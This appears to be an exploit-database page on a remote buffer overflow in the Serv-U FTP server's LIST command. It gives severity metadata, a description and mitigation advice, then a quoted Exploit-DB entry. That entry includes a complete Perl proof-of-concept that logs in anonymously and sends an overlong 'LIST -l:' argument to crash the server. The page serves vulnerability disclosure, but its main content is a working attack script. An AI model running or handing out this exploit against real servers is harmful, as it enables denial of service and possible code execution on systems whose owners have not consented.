header-logo
Suggest Exploit
vendor:
Serv-U
by:
7.5
CVSS
HIGH
Remote Buffer Overflow
119
CWE
Product Name: Serv-U
Affected Version From:
Affected Version To:
Patch Exists: NO
Related CWE:
CPE: a:rhino_soft:serv-u
Metasploit:
Other Scripts:
Platforms Tested:

Remote Buffer Overflow in Serv-U

The Serv-U application is affected by a remote buffer overflow vulnerability in the list parameter. This vulnerability arises due to a lack of proper validation of buffer boundaries during the processing of user input. Successful exploitation of this vulnerability can lead to a denial of service condition and potentially allow an attacker to execute arbitrary code on the affected system with the privileges of the user running the vulnerable application.

Mitigation:

To mitigate this vulnerability, it is recommended to update to the latest version of Serv-U that includes a patch for this issue. Additionally, it is advisable to implement proper input validation and sanitization techniques to prevent buffer overflow vulnerabilities.
Source

Exploit-DB raw data:

source: https://www.securityfocus.com/bid/10181/info

Reportedly Serv-U is affected by a remote buffer overflow vulnerability in the list parameter. This issue is due to a failure of the application to properly validate buffer boundaries during processing of user input.

Successful exploitation would immediately produce a denial of service condition in the affected process. This issue may also be leveraged to execute code on the affected system with the privileges of the user that invoked the vulnerable application, although this has not been confirmed.

#!/usr/bin/perl

use IO::Socket;

$host = "www.example.com";

$remote = IO::Socket::INET->new ( Proto => "tcp",
     PeerAddr => $host,
     PeerPort => "2116",
    );

unless ($remote) { die "cannot connect to ftp daemon on $host" }

print "connected\n";
while (<$remote>)
{
 print $_;
 if (/220 /)
 {
  last;
 }
}

$remote->autoflush(1);

my $ftp = "USER anonymous\r\n";

print $remote $ftp;
print $ftp;
sleep(1);

while (<$remote>)
{
 print $_;
 if (/331 /)
 {
  last;
 }
}

$ftp = join("", "PASS ", "a\@b.com", "\r\n");
print $remote $ftp;
print $ftp;
sleep(1);

while (<$remote>)
{
 print $_;
 if (/230 /)
 {
  last;
 }
}

my $ftp = join ("", "LIST -l:", "A"x(134), "\r\n");

print $remote $ftp;
print $ftp;
sleep(1);

while (<$remote>)
{
 print $_;
 if (/250 Done/)
 {
  last;
 }
}

close $remote;